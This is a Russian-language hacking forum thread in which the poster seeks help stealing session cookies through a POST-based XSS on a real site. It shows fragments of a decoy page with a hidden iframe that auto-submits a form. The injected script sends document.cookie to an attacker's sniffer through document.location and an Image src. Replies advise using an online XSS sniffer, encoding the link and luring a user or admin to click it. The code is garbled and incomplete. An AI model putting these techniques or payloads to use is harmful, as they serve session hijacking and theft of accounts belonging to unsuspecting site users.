![]() |
Недавно я нашел xss POST пассивку уязвимость на неком сайте site.com. Мною был создан сайт на бесплатном хостинге, где была размещена моя html страница, с framom, который открывает нашу страницу site.com/index.html, вводит скрипт в нашу форму "POST" и подтверждает её. В результате frame выводит его на http://evilhost.ru/user/login_form?login=xxx
В фрейме выполняется код по нашей форме "POST" и его перекидывает на бесплатный сниффер document.location.href="http://sniff/s.php?"+document.cookie;'> Вот код на странице моего сайта: alert(document.cookie)"> window.onload = function(){ var win = document.getElementById("iframe").contentWindow; document.getElementById("form").onsubmit = function(e){ win.postMessage( document.getElementById("log").value ); win.postMessage( document.getElementById("pass").value ); win.postMessage( document.getElementById("pag").value ); e.preventDefault(); }; }; Если я в брузере ОПЕРА набираю свой сайт-приманку , он должен показать мне cookie c http://сайт с ХСС/user/login_form , выскакивает окошко :siteowner=1 и все .Получается cookie при загрузке iframe не передаются .Если отправляю iframe на сниффер то приходит:QUERY:siteowner=1, REFERER: http://мой_Сайт/form.html ,AGENT:Opera/9.80 (Windows.. и все. ПОЧЕМУ в СКРИПТ script>alert(document.cookie) cookie не передаются ? Help... |
нихуя ты закатил речь, проще обьясни что ты зделал?
|
Я сам новичок в этом но с xss разобрался.
В этой статье все написано. Проще зделай как я : зарегся на online xss snifer тут , там есть уже готовый скрипт который ты должен подставлять после "=" в уязвимом сайте , и всю эту длиную ссылку (мне кажется лучше ее закодировать) даешь пользователю или админу чтобы он по ней прошел и тебе там в лог придут куки. Удачи. |
Цитата:
найти ошибку в моем post-запросе лежащем на моем сайте (см. выше). Ссылка типа: http://сайт сХСС/user/form?Login=akxhijfa&page= - ЭТО GET запрос , а уменя POST XSS....КАК сделать ссылку ,чтобы при нажатии на нее подгружалась заранее заполненная нами форма и чтобы она автоматом перебрасывала куки на snifer? |
Неужели такого рода уязвимость можно применить только в сочетании с CSRF ? Ну где же Вы спецы ?
|
Можно и POST юзнуть. Но только тебе придется заманить жертву на свой сайт, а потом уже со своего сайта редиректить на сайт жертвы.
|
Цель именно такая , я заманиваю жертву ,подкидывая ему ссылку на свой сайт и с помощью этого кода ,c скрытым iframe:
Ferst; function submit_form(){ window.evilframe.document.forms[0].submit(); } он отправляется на заранее сформированную мною форму,которая сабмитит на сайт жертвы (уязвимый сайт с ХСС): FORMA img = new Image(); img.src = "http://сниффер"+document.cookie;"> //куки отправляются на сниффер По идей куки должны приити ,но приходит только USER_AGENT,REFERER,IP,дата ,работу снифера проверял - работает,получается при переходе на мой сайт и отправке формы, в cookie ничего нет(просто пусто)... CSRF-защита или я что-то делаю не так? |
| Время: 03:40 |